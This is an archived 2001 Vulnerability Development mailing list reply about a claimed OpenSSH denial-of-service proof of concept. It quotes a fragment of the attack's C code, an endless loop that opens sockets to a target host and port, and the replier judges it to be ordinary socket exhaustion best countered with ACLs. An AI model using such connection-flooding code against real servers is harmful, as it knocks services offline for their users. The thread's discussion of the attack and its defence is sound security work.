Vulnerability Development mailing list archives

Re: Possible OpenSSH DoS Attack

From: Josha Bronson <dmuz () slartibartfast angrypacket com>
Date: Mon, 10 Dec 2001 18:34:32 -0800

On Mon, Dec 10, 2001 at 11:19:18PM -0000, Pedro Inacio said:

--[ OpenSSH DoS Attack proof of concept ]--
  by DrBrain <drbrain () phibernet org> / http://www.phibernet.org


--[ Intro ]--

After some tests with sshd, I have noticed that it is possible to generate a
DoS attack that gives you the following message when you try to contact the
service:

----------
$ ssh user () somehost com
ssh_exchange_identification: Connection closed by remote host
----------

[snip...]

Isn't this just TCP socket connection overloading? Fill up the max
amount of sockets and then the OS (any OS as I understand it, all with
differant limits of course) won't allocate anymore?

Not much to be done except probably a good set of ACLs...

  for(;;) {
    servAddr.sin_family = h->h_addrtype;
    memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0],
h->h_length);
    servAddr.sin_port = htons(atoi(argv[2]));

    sd = socket(AF_INET, SOCK_STREAM, 0);
    if(sd<0) {
      perror("Cannot Open Socket ");
      exit(1);
    }


-- 
josha.bronson(aka->dmuz) >> dmuz () angrypacket com
networks/systems/security && CCNA, RHCE 
josha.net || dmuz.angrypacket.com

Current thread:

Possible OpenSSH DoS Attack Pedro Inacio (Dec 10)
- Re: Possible OpenSSH DoS Attack Josha Bronson (Dec 10)
- Re: Possible OpenSSH DoS Attack Robert van der Meulen (Dec 11)
  - Re: Possible OpenSSH DoS Attack Jose Nazario (Dec 11)
- Re: Possible OpenSSH DoS Attack Markus Friedl (Dec 11)